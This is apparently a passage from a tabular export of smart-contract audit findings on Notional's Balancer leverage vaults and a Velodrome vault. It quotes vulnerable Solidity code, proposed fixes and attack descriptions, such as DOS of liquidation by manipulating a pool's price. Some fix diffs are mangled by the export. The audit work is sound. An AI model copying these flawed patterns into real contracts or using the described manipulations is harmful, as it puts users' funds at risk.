`Stable2TokenOracleMath._validateSpotPriceAndPairPrice` function. As such, reinvest feature of the vault will be broken and the vault will not be able to reinvest its rewards.\\nThis in turn led to a loss of assets for vault users, and the value of their strategy tokens will be struck and will not appreciate.","```\\nFile: Stable2TokenOracleMath.sol\\n function _validateSpotPriceAndPairPrice(\\n StableOracleContext calldata oracleContext,\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 primaryAmount, \\n uint256 secondaryAmount\\n ) internal view {\\n // Oracle price is always specified in terms of primary, so tokenIndex == 0 for primary\\n uint256 spotPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: poolContext.primaryBalance,\\n secondaryBalance: poolContext.secondaryBalance,\\n tokenIndex: 0\\n });\\n\\n /// @notice Check spotPrice against oracle price to make sure that \\n /// the pool is not being manipulated\\n _checkPriceLimit(strategyContext, oraclePrice, spotPrice);\\n\\n /// @notice Balancer math functions expect all amounts to be in BALANCER_PRECISION\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n uint256 secondaryPrecision = 10 ** poolContext.secondaryDecimals;\\n primaryAmount = primaryAmount * BalancerConstants.BALANCER_PRECISION / primaryPrecision;\\n secondaryAmount = secondaryAmount * BalancerConstants.BALANCER_PRECISION / secondaryPrecision;\\n\\n uint256 calculatedPairPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: primaryAmount,\\n secondaryBalance: secondaryAmount,\\n tokenIndex: 0\\n });\\n```\\n" +`msgValue` will not be populated if ETH is the secondary token,high,"`msgValue` will not be populated if ETH is the secondary token in the two token leverage vault, leading to a loss of assets as the ETH is not forwarded to the Balancer Pool during a trade.\\nBased on the source code of the two token pool leverage vault, it is possible to deploy a vault to support a Balancer pool with an arbitrary token as the primary token and ETH as the secondary token. The primary token is always the borrowing currency in the vault.\\nHowever, Line 60 of `TwoTokenPoolUtils._getPoolParams` function below assumes that if one of the two tokens is ETH in the pool, it will always be the primary token or borrowing currency, which is not always the case. If the ETH is set as the secondary token, the `msgValue` will not be populated.\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice Returns parameters for joining and exiting Balancer pools\\n function _getPoolParams(\\n TwoTokenPoolContext memory context,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isJoin\\n ) internal pure returns (PoolParams memory) {\\n IAsset[] memory assets = new IAsset[](2);\\n assets[context.primaryIndex] = IAsset(context.primaryToken);\\n assets[context.secondaryIndex] = IAsset(context.secondaryToken);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[context.primaryIndex] = primaryAmount;\\n amounts[context.secondaryIndex] = secondaryAmount;\\n\\n uint256 msgValue;\\n if (isJoin && assets[context.primaryIndex] == IAsset(Deployments.ETH_ADDRESS)) {\\n msgValue = amounts[context.primaryIndex];\\n }\\n\\n return PoolParams(assets, amounts, msgValue);\\n }\\n```\\n\\nAs a result, when the caller joins the Balancer pool, the `params.msgValue` will be empty, and no secondary token (ETH) will be forwarded to the Balancer pool. The ETH will remain stuck in the vault and the caller will receive much fewer BPT tokens in return.\\n```\\nFile: BalancerUtils.sol\\n /// @notice Joins a balancer pool using exact tokens in\\n function _joinPoolExactTokensIn(\\n PoolContext memory context,\\n PoolParams memory params,\\n uint256 minBPT\\n ) internal returns (uint256 bptAmount) {\\n bptAmount = IERC20(address(context.pool)).balanceOf(address(this));\\n Deployments.BALANCER_VAULT.joinPool{value: params.msgValue}(\\n context.poolId,\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest(\\n params.assets,\\n params.amounts,\\n abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n params.amounts,\\n minBPT // Apply minBPT to prevent front running\\n ),\\n false // Don't use internal balances\\n )\\n );\\n bptAmount =\\n IERC20(address(context.pool)).balanceOf(address(this)) -\\n bptAmount;\\n }\\n```\\n","Consider populating the `msgValue` if the secondary token is ETH.\\n```\\n/// @notice Returns parameters for joining and exiting Balancer pools\\nfunction _getPoolParams(\\n TwoTokenPoolContext memory context,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isJoin\\n) internal pure returns (PoolParams memory) {\\n IAsset[] memory assets = new IAsset[](2);\\n assets[context.primaryIndex] = IAsset(context.primaryToken);\\n assets[context.secondaryIndex] = IAsset(context.secondaryToken);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[context.primaryIndex] = primaryAmount;\\n amounts[context.secondaryIndex] = secondaryAmount;\\n\\n uint256 msgValue;\\n if (isJoin && assets[context.primaryIndex] == IAsset(Deployments.ETH_ADDRESS)) {\\n msgValue = amounts[context.primaryIndex];\\n }\\n// Add the line below\\n if (isJoin && assets[context.secondaryIndex] == IAsset(Deployments.ETH_ADDRESS)) {\\n// Add the line below\\n msgValue = amounts[context.secondaryIndex];\\n// Add the line below\\n }\\n \\n return PoolParams(assets, amounts, msgValue);\\n}\\n```\\n","Loss of assets for the callers as ETH will remain stuck in the vault and not forwarded to the Balancer Pool. Since the secondary token (ETH) is not forwarded to the Balancer pool, the caller will receive much fewer BPT tokens in return when joining the pool.\\nThis issue affects the deposit and reinvest reward functions of the vault, which means that the depositor will receive fewer strategy tokens in return during depositing, and the vault will receive less BPT in return during reinvesting.","```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice Returns parameters for joining and exiting Balancer pools\\n function _getPoolParams(\\n TwoTokenPoolContext memory context,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isJoin\\n ) internal pure returns (PoolParams memory) {\\n IAsset[] memory assets = new IAsset[](2);\\n assets[context.primaryIndex] = IAsset(context.primaryToken);\\n assets[context.secondaryIndex] = IAsset(context.secondaryToken);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[context.primaryIndex] = primaryAmount;\\n amounts[context.secondaryIndex] = secondaryAmount;\\n\\n uint256 msgValue;\\n if (isJoin && assets[context.primaryIndex] == IAsset(Deployments.ETH_ADDRESS)) {\\n msgValue = amounts[context.primaryIndex];\\n }\\n\\n return PoolParams(assets, amounts, msgValue);\\n }\\n```\\n" +`totalBPTSupply` will be excessively inflated,high,"The `totalBPTSupply` will be excessively inflated as `totalSupply` was used instead of `virtualSupply`. This might cause a boosted balancer leverage vault not to be emergency settled in a timely manner and holds too large of a share of the liquidity within the pool, thus having problems exiting its position.\\nBalancer's Boosted Pool uses Phantom BPT where all pool tokens are minted at the time of pool creation and are held by the pool itself. Therefore, `virtualSupply` should be used instead of `totalSupply` to determine the amount of BPT supply in circulation.\\nHowever, within the `Boosted3TokenAuraVault.getEmergencySettlementBPTAmount` function, the `totalBPTSupply` at Line 169 is derived from the `totalSupply` instead of the `virtualSupply`. As a result, `totalBPTSupply` will be excessively inflated (2**(111)).\\n```\\nFile: Boosted3TokenAuraVault.sol\\n function getEmergencySettlementBPTAmount(uint256 maturity) external view returns (uint256 bptToSettle) {\\n Boosted3TokenAuraStrategyContext memory context = _strategyContext();\\n bptToSettle = context.baseStrategy._getEmergencySettlementParams({\\n maturity: maturity, \\n totalBPTSupply: IERC20(context.poolContext.basePool.basePool.pool).totalSupply()\\n });\\n }\\n```\\n\\nAs a result, the `emergencyBPTWithdrawThreshold` threshold will be extremely high. As such, the condition at Line 97 will always be evaluated as true and result in a revert.\\n```\\nFile: SettlementUtils.sol\\n function _getEmergencySettlementParams(\\n StrategyContext memory strategyContext,\\n uint256 maturity,\\n uint256 totalBPTSupply\\n ) internal view returns(uint256 bptToSettle) {\\n StrategyVaultSettings memory settings = strategyContext.vaultSettings;\\n StrategyVaultState memory state = strategyContext.vaultState;\\n\\n // Not in settlement window, check if BPT held is greater than maxBalancerPoolShare * total BPT supply\\n uint256 emergencyBPTWithdrawThreshold = settings._bptThreshold(totalBPTSupply);\\n\\n if (strategyContext.vaultState.totalBPTHeld <= emergencyBPTWithdrawThreshold)\\n revert Errors.InvalidEmergencySettlement();\\n```\\n\\n```\\nFile: BalancerVaultStorage.sol\\n function _bptThreshold(StrategyVaultSettings memory strategyVaultSettings, uint256 totalBPTSupply)\\n internal pure returns (uint256) {\\n return (totalBPTSupply * strategyVaultSettings.maxBalancerPoolShare) / BalancerConstants.VAULT_PERCENT_BASIS;\\n }\\n```\\n","Update the function to compute the `totalBPTSupply` from the virtual supply.\\n```\\n function getEmergencySettlementBPTAmount(uint256 maturity) external view returns (uint256 bptToSettle) {\\n Boosted3TokenAuraStrategyContext memory context = _strategyContext();\\n bptToSettle = context.baseStrategy._getEmergencySettlementParams({\\n maturity: maturity, \\n// Remove the line below\\n totalBPTSupply: IERC20(context.poolContext.basePool.basePool.pool).totalSupply()\\n// Add the line below\\n totalBPTSupply: context.poolContext._getVirtualSupply(context.oracleContext)\\n });\\n }\\n```\\n","Anyone (e.g. off-chain keeper or bot) that relies on the `SettlementUtils.getEmergencySettlementBPTAmount` to determine if an emergency settlement is needed would be affected. The caller will presume that since the function reverts, emergency settlement is not required and the BPT threshold is still within the healthy level. The caller will wrongly decided not to perform an emergency settlement on a vault that has already exceeded the BPT threshold.\\nIf a boosted balancer leverage vault is not emergency settled in a timely manner and holds too large of a share of the liquidity within the pool, it will have problems exiting its position.","```\\nFile: Boosted3TokenAuraVault.sol\\n function getEmergencySettlementBPTAmount(uint256 maturity) external view returns (uint256 bptToSettle) {\\n Boosted3TokenAuraStrategyContext memory context = _strategyContext();\\n bptToSettle = context.baseStrategy._getEmergencySettlementParams({\\n maturity: maturity, \\n totalBPTSupply: IERC20(context.poolContext.basePool.basePool.pool).totalSupply()\\n });\\n }\\n```\\n" +Users redeem strategy tokens but receives no assets in return,high,"Due to a rounding error in Solidity, it is possible that a user burns their strategy tokens, but receives no assets in return due to issues in the following functions:\\nStrategyUtils._convertStrategyTokensToBPTClaim\\nBoosted3TokenPoolUtils._redeem\\nTwoTokenPoolUtils._redeem\\nThis affects both the TwoToken and Boosted3Token vaults\\n```\\nint256 internal constant INTERNAL_TOKEN_PRECISION = 1e8;\\nuint256 internal constant BALANCER_PRECISION = 1e18;\\n```\\n\\nWithin the `StrategyUtils._convertStrategyTokensToBPTClaim` function, it was observed that if the numerator is smaller than the denominator, the `bptClaim` will be zero.\\n```\\nFile: StrategyUtils.sol\\n function _convertStrategyTokensToBPTClaim(StrategyContext memory context, uint256 strategyTokenAmount)\\n internal pure returns (uint256 bptClaim) {\\n require(strategyTokenAmount <= context.vaultState.totalStrategyTokenGlobal);\\n if (context.vaultState.totalStrategyTokenGlobal > 0) {\\n bptClaim = (strategyTokenAmount * context.vaultState.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n }\\n }\\n```\\n\\nWhen the `bptClaim` is zero, the function returns zero instead of reverting. Therefore, it is possible that a user redeems (""burns"") their strategy tokens, but receives no assets in return because the number of strategy tokens redeemed by the user is too small.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n ) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n if (bptClaim == 0) return 0;\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n }\\n```\\n","Consider reverting if the assets (bptClaim) received is zero. This check has been implemented in many well-known vault designs as this is a commonly known issue (e.g. Solmate)\\n```\\nfunction _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n// Remove the line below\\n if (bptClaim == 0) return 0;\\n// Add the line below\\n require(bptClaim > 0, ""zero asset"")\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld // Remove the line below\\n= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal // Remove the line below\\n= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\n","Loss of assets for the users as they burn their strategy tokens, but receive no assets in return.",```\\nint256 internal constant INTERNAL_TOKEN_PRECISION = 1e8;\\nuint256 internal constant BALANCER_PRECISION = 1e18;\\n```\\n +Scaling factor of the wrapped token is incorrect,high,"The scaling factor of the wrapped token within the Boosted3Token leverage vault is incorrect. Thus, all the computations within the leverage vault will be incorrect. This leads to an array of issues such as users being liquidated prematurely or users being able to borrow more than they are allowed to.\\nIn Line 120, it calls the `getScalingFactors` function of the LinearPool to fetch the scaling factors of the LinearPool.\\nIn Line 123, it computes the final scaling factor of the wrapped token by multiplying the main token's decimal scaling factor with the wrapped token rate, which is incorrect.\\n```\\nFile: Boosted3TokenPoolMixin.sol\\n function _underlyingPoolContext(ILinearPool underlyingPool) private view returns (UnderlyingPoolContext memory) {\\n (uint256 lowerTarget, uint256 upperTarget) = underlyingPool.getTargets();\\n uint256 mainIndex = underlyingPool.getMainIndex();\\n uint256 wrappedIndex = underlyingPool.getWrappedIndex();\\n\\n (\\n /* address[] memory tokens */,\\n uint256[] memory underlyingBalances,\\n /* uint256 lastChangeBlock */\\n ) = Deployments.BALANCER_VAULT.getPoolTokens(underlyingPool.getPoolId());\\n\\n uint256[] memory underlyingScalingFactors = underlyingPool.getScalingFactors();\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token increases in\\n // value.\\n uint256 wrappedScaleFactor = underlyingScalingFactors[mainIndex] * underlyingPool.getWrappedTokenRate() /\\n BalancerConstants.BALANCER_PRECISION;\\n\\n return UnderlyingPoolContext({\\n mainScaleFactor: underlyingScalingFactors[mainIndex],\\n mainBalance: underlyingBalances[mainIndex],\\n wrappedScaleFactor: wrappedScaleFactor,\\n wrappedBalance: underlyingBalances[wrappedIndex],\\n virtualSupply: underlyingPool.getVirtualSupply(),\\n fee: underlyingPool.getSwapFeePercentage(),\\n lowerTarget: lowerTarget,\\n upperTarget: upperTarget \\n });\\n }\\n```\\n\\nThe correct way of calculating the final scaling factor of the wrapped token is to multiply the wrapped token's decimal scaling factor by the wrapped token rate as shown below:\\n```\\nscalingFactors[_wrappedIndex] = _scalingFactorWrappedToken.mulDown(_getWrappedTokenRate());\\n```\\n\\nThe `_scalingFactorWrappedToken` is the scaling factor that, when multiplied to a token amount, normalizes its balance as if it had 18 decimals. The `_getWrappedTokenRate` function returns the wrapped token rate.\\nIt is important to note that the decimal scaling factor of the main and wrapped tokens are not always the same. Thus, they cannot be used interchangeably.\\n```\\n // Scaling factors\\n\\n function _scalingFactor(IERC20 token) internal view virtual returns (uint256) {\\n if (token == _mainToken) {\\n return _scalingFactorMainToken;\\n } else if (token == _wrappedToken) {\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token\\n // increases in value.\\n return _scalingFactorWrappedToken.mulDown(_getWrappedTokenRate());\\n } else if (token == this) {\\n return FixedPoint.ONE;\\n } else {\\n _revert(Errors.INVALID_TOKEN);\\n }\\n }\\n\\n /**\\n * @notice Return the scaling factors for all tokens, including the BPT.\\n */\\n function getScalingFactors() public view virtual override returns (uint256[] memory) {\\n uint256[] memory scalingFactors = new uint256[](_TOTAL_TOKENS);\\n\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token increases in\\n // value.\\n scalingFactors[_mainIndex] = _scalingFactorMainToken;\\n scalingFactors[_wrappedIndex] = _scalingFactorWrappedToken.mulDown(_getWrappedTokenRate());\\n scalingFactors[_BPT_INDEX] = FixedPoint.ONE;\\n\\n return scalingFactors;\\n }\\n```\\n","There is no need to manually calculate the final scaling factor of the wrapped token again within the code. This is because the wrapped token scaling factor returned by the `LinearPool.getScalingFactors()` function already includes the token rate. Refer to the Balancer's source code above for referen\\n```\\nfunction _underlyingPoolContext(ILinearPool underlyingPool) private view returns (UnderlyingPoolContext memory) {\\n (uint256 lowerTarget, uint256 upperTarget) = underlyingPool.getTargets();\\n uint256 mainIndex = underlyingPool.getMainIndex();\\n uint256 wrappedIndex = underlyingPool.getWrappedIndex();\\n\\n (\\n /* address[] memory tokens */,\\n uint256[] memory underlyingBalances,\\n /* uint256 lastChangeBlock */\\n ) = Deployments.BALANCER_VAULT.getPoolTokens(underlyingPool.getPoolId());\\n\\n uint256[] memory underlyingScalingFactors = underlyingPool.getScalingFactors();\\n// Remove the line below\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token increases in\\n// Remove the line below\\n // value.\\n// Remove the line below\\n uint256 wrappedScaleFactor = underlyingScalingFactors[mainIndex] * underlyingPool.getWrappedTokenRate() /\\n// Remove the line below\\n BalancerConstants.BALANCER_PRECISION;\\n\\n return UnderlyingPoolContext({\\n mainScaleFactor: underlyingScalingFactors[mainIndex],\\n mainBalance: underlyingBalances[mainIndex],\\n// Remove the line below\\n wrappedScaleFactor: wrappedScaleFactor,\\n// Add the line below\\n wrappedScaleFactor: underlyingScalingFactors[wrappedIndex], \\n wrappedBalance: underlyingBalances[wrappedIndex],\\n virtualSupply: underlyingPool.getVirtualSupply(),\\n fee: underlyingPool.getSwapFeePercentage(),\\n lowerTarget: lowerTarget,\\n upperTarget: upperTarget \\n });\\n}\\n```\\n","Within the Boosted 3 leverage vault, the balances are scaled before passing them to the stable math function for computation since the stable math function only works with balances that have been normalized to 18 decimals. If the scaling factor is incorrect, all the computations within the leverage vault will be incorrect, which affects almost all the vault functions.\\nFor instance, the `Boosted3TokenAuraVault.convertStrategyToUnderlying` function relies on the wrapped scaling factor for its computation under the hood. This function is utilized by Notional's `VaultConfiguration.calculateCollateralRatio` function to determine the value of the vault share when computing the collateral ratio. If the underlying result is wrong, the collateral ratio will be wrong too, and this leads to an array of issues such as users being liquidated prematurely or users being able to borrow more than they are allowed to.","```\\nFile: Boosted3TokenPoolMixin.sol\\n function _underlyingPoolContext(ILinearPool underlyingPool) private view returns (UnderlyingPoolContext memory) {\\n (uint256 lowerTarget, uint256 upperTarget) = underlyingPool.getTargets();\\n uint256 mainIndex = underlyingPool.getMainIndex();\\n uint256 wrappedIndex = underlyingPool.getWrappedIndex();\\n\\n (\\n /* address[] memory tokens */,\\n uint256[] memory underlyingBalances,\\n /* uint256 lastChangeBlock */\\n ) = Deployments.BALANCER_VAULT.getPoolTokens(underlyingPool.getPoolId());\\n\\n uint256[] memory underlyingScalingFactors = underlyingPool.getScalingFactors();\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token increases in\\n // value.\\n uint256 wrappedScaleFactor = underlyingScalingFactors[mainIndex] * underlyingPool.getWrappedTokenRate() /\\n BalancerConstants.BALANCER_PRECISION;\\n\\n return UnderlyingPoolContext({\\n mainScaleFactor: underlyingScalingFactors[mainIndex],\\n mainBalance: underlyingBalances[mainIndex],\\n wrappedScaleFactor: wrappedScaleFactor,\\n wrappedBalance: underlyingBalances[wrappedIndex],\\n virtualSupply: underlyingPool.getVirtualSupply(),\\n fee: underlyingPool.getSwapFeePercentage(),\\n lowerTarget: lowerTarget,\\n upperTarget: upperTarget \\n });\\n }\\n```\\n" +"Boosted3TokenPoolUtils.sol : _redeem - updating the `totalBPTHeld , totalStrategyTokenGlobal` after `_unstakeAndExitPool` is not safe",medium,"_redeem function is used to claim the BPT amount using the strategy tokens.\\nIt is first calling the `_unstakeAndExitPool` function and then updating the `totalBPTHeld , totalStrategyTokenGlobal`\\n```\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n\\n if (bptClaim == 0) return 0;\\n\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\n\\nFirst _unstakeAndExitPool is called and then totalBPTHeld and totalStrategyTokenGlobal are updated.",First update `totalBPTHeld and totalStrategyTokenGlobal` and then call the `_unstakeAndExitPool`,"Reentering during any of the function call inside `_unstakeAndExitPool` could be problematic. `stakingContext.auraRewardPool.withdrawAndUnwrap(bptClaim, false)` `BalancerUtils._swapGivenIn`\\nWell it need deep study to analyze the impact, but I would suggest to update the balance first and then call the `_unstakeAndExitPool`","```\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n\\n if (bptClaim == 0) return 0;\\n\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\n" +Unable to deploy new leverage vault for certain MetaStable Pool,medium,"Notional might have an issue deploying the new leverage vault for a MetaStable Pool that does not have Balancer Oracle enabled.\\n```\\nFile: MetaStable2TokenVaultMixin.sol\\nabstract contract MetaStable2TokenVaultMixin is TwoTokenPoolMixin {\\n constructor(NotionalProxy notional_, AuraVaultDeploymentParams memory params)\\n TwoTokenPoolMixin(notional_, params)\\n {\\n // The oracle is required for the vault to behave properly\\n (/* */, /* */, /* */, /* */, bool oracleEnabled) = \\n IMetaStablePool(address(BALANCER_POOL_TOKEN)).getOracleMiscData();\\n require(oracleEnabled);\\n }\\n```\\n","Remove the Balancer Oracle check from the constructor.\\n```\\n constructor(NotionalProxy notional_, AuraVaultDeploymentParams memory params)\\n TwoTokenPoolMixin(notional_, params)\\n {\\n// Remove the line below\\n // The oracle is required for the vault to behave properly\\n// Remove the line below\\n (/* */, /* */, /* */, /* */, bool oracleEnabled) = \\n// Remove the line below\\n IMetaStablePool(address(BALANCER_POOL_TOKEN)).getOracleMiscData();\\n// Remove the line below\\n require(oracleEnabled);\\n }\\n```\\n","Notional might have an issue deploying the new leverage vault for a MetaStable Pool that does not have Balancer Oracle enabled. Since Balancer Oracle has been deprecated, the Balancer Oracle will likely be disabled on the MetaStable Pool.","```\\nFile: MetaStable2TokenVaultMixin.sol\\nabstract contract MetaStable2TokenVaultMixin is TwoTokenPoolMixin {\\n constructor(NotionalProxy notional_, AuraVaultDeploymentParams memory params)\\n TwoTokenPoolMixin(notional_, params)\\n {\\n // The oracle is required for the vault to behave properly\\n (/* */, /* */, /* */, /* */, bool oracleEnabled) = \\n IMetaStablePool(address(BALANCER_POOL_TOKEN)).getOracleMiscData();\\n require(oracleEnabled);\\n }\\n```\\n" +Possible division by zero depending on `TradingModule.getOraclePrice` return values,medium,"Some functions depending on `TradingModule.getOraclePrice` accept non-negative (int256 `answer`, int256 decimals) return values. In case any of those are equal to zero, division depending on `answer` or `decimals` will revert. In the worst case scenario, this will prevent the protocol from continuing operating.\\nThe function `TradingModule.getOraclePrice` properly validates that return values from Chainlink price feeds are positive.\\nNevertheless, `answer` may currently return zero, as it is calculated as `(basePrice * quoteDecimals * RATE_DECIMALS) / (quotePrice * baseDecimals);`, which can be truncated down to zero, depending on base/quote prices [1]. Additionally, `decimals` may in the future return zero, depending on changes to the protocol code, as the NatSpec states that this is a `number of `decimals` in the rate, currently hardcoded to 1e18` [2].\\nIf any of these return values are zero, calculations that use division depending on `TradingModule.getOraclePrice` will revert.\\nMore specifically:\\n[1]\\n1.1 `TradingModule.getLimitAmount`\\n```\\n require(oraclePrice >= 0); /// @dev Chainlink rate error\\n```\\n\\nthat calls `TradingUtils._getLimitAmount`, which reverts if `oraclePrice` is `0`\\n```\\n oraclePrice = (oracleDecimals * oracleDecimals) / oraclePrice;\\n```\\n\\n[2] 2.1 `TwoTokenPoolUtils._getOraclePairPrice`\\n```\\n require(decimals >= 0);\\n\\n if (uint256(decimals) != BalancerConstants.BALANCER_PRECISION) {\\n rate = (rate * int256(BalancerConstants.BALANCER_PRECISION)) / decimals;\\n }\\n```\\n\\n2.2 `TradingModule.getLimitAmount`\\n```\\n require(oracleDecimals >= 0); /// @dev Chainlink decimals error\\n```\\n\\nthat calls `TradingUtils._getLimitAmount`, which reverts if `oracleDecimals` is `0`\\n```\\n limitAmount =\\n ((oraclePrice + \\n ((oraclePrice * uint256(slippageLimit)) /\\n Constants.SLIPPAGE_LIMIT_PRECISION)) * amount) / \\n oracleDecimals;\\n```\\n\\n2.3 `CrossCurrencyfCashVault.convertStrategyToUnderlying`\\n```\\n return (pvInternal * borrowTokenDecimals * rate) /\\n (rateDecimals * int256(Constants.INTERNAL_TOKEN_PRECISION));\\n```\\n","Validate that the return values are strictly positive (instead of non-negative) in case depending function calculations may result in division by zero. This can be either done on `TradingModule.getOraclePrice` directly or on the depending functions.\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/trading/TradingModule.sol b/contracts/trading/TradingModule.sol\\nindex bfc8505..70b40f2 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/trading/TradingModule.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/trading/TradingModule.sol\\n@@ // Remove the line below\\n251,6 // Add the line below\\n251,9 @@ contract TradingModule is Initializable, UUPSUpgradeable, ITradingModule {\\n (basePrice * quoteDecimals * RATE_DECIMALS) /\\n (quotePrice * baseDecimals);\\n decimals = RATE_DECIMALS;\\n// Add the line below\\n\\n// Add the line below\\n require(answer > 0); /// @dev Chainlink rate error\\n// Add the line below\\n require(decimals > 0); /// @dev Chainlink decimals error\\n }\\n \\n function _hasPermission(uint32 flags, uint32 flagID) private pure returns (bool) {\\n@@ // Remove the line below\\n279,9 // Add the line below\\n282,6 @@ contract TradingModule is Initializable, UUPSUpgradeable, ITradingModule {\\n // prettier// Remove the line below\\nignore\\n (int256 oraclePrice, int256 oracleDecimals) = getOraclePrice(sellToken, buyToken);\\n \\n// Remove the line below\\n require(oraclePrice >= 0); /// @dev Chainlink rate error\\n// Remove the line below\\n require(oracleDecimals >= 0); /// @dev Chainlink decimals error\\n// Remove the line below\\n\\n limitAmount = TradingUtils._getLimitAmount({\\n tradeType: tradeType,\\n sellToken: sellToken,\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/vaults/balancer/internal/pool/TwoTokenPoolUtils.sol b/contracts/vaults/balancer/internal/pool/TwoTokenPoolUtils.sol\\nindex 4954c59..6315c0a 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/vaults/balancer/internal/pool/TwoTokenPoolUtils.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/vaults/balancer/internal/pool/TwoTokenPoolUtils.sol\\n@@ // Remove the line below\\n76,10 // Add the line below\\n76,7 @@ library TwoTokenPoolUtils {\\n (int256 rate, int256 decimals) = tradingModule.getOraclePrice(\\n poolContext.primaryToken, poolContext.secondaryToken\\n );\\n// Remove the line below\\n require(rate > 0);\\n// Remove the line below\\n require(decimals >= 0);\\n \\n if (uint256(decimals) != BalancerConstants.BALANCER_PRECISION) {\\n rate = (rate * int256(BalancerConstants.BALANCER_PRECISION)) / decimals;\\n }\\n```\\n","In the worst case, the protocol might stop operating.\\nAlbeit unlikely that `decimals` is ever zero, since currently this is a hardcoded value, it is possible that `answer` might be zero due to round-down performed by the division in `TradingModule.getOraclePrice`. This can happen if the quote token is much more expensive than the base token. In this case, `TradingModule.getLimitAmount` and depending calls, such as `TradingModule.executeTradeWithDynamicSlippage` might revert.",```\\n require(oraclePrice >= 0); /// @dev Chainlink rate error\\n```\\n +Malicious user can DOS pool and avoid liquidation by creating secondary liquidity pool for Velodrome token pair,high,"For every Vault_Velo interaction the vault attempts to price the liquidity of the user. This calls priceLiquidity in the corresponding DepsoitReciept. The prices the underlying assets by swapping them through the Velodrome router. Velodrome can have both a stable and volatile pool for each asset pair. When calling the router directly it routes through the pool that gives the best price. In priceLiquidity the transaction will revert if the router routes through the wrong pool (i.e. trading the volatile pool instead of the stable pool). A malicious user can use this to their advantage to avoid being liquidated. They could manipulate the price of the opposite pool so that any call to liquidate them would route through the wrong pool and revert.\\n```\\n uint256 amountOut; //amount received by trade\\n bool stablePool; //if the traded pool is stable or volatile.\\n (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n require(stablePool == stable, ""pricing occuring through wrong pool"" );\\n```\\n\\nDepositReceipt uses the getAmountOut call the estimate the amountOut. The router will return the best rate between the volatile and stable pool. If the wrong pool give the better rate then the transaction will revert. Since pricing is called during liquidation, a malicious user could manipulate the price of the wrong pool so that it returns the better rate and always reverts the liquidation call.","Instead of quoting from the router, query the correct pool 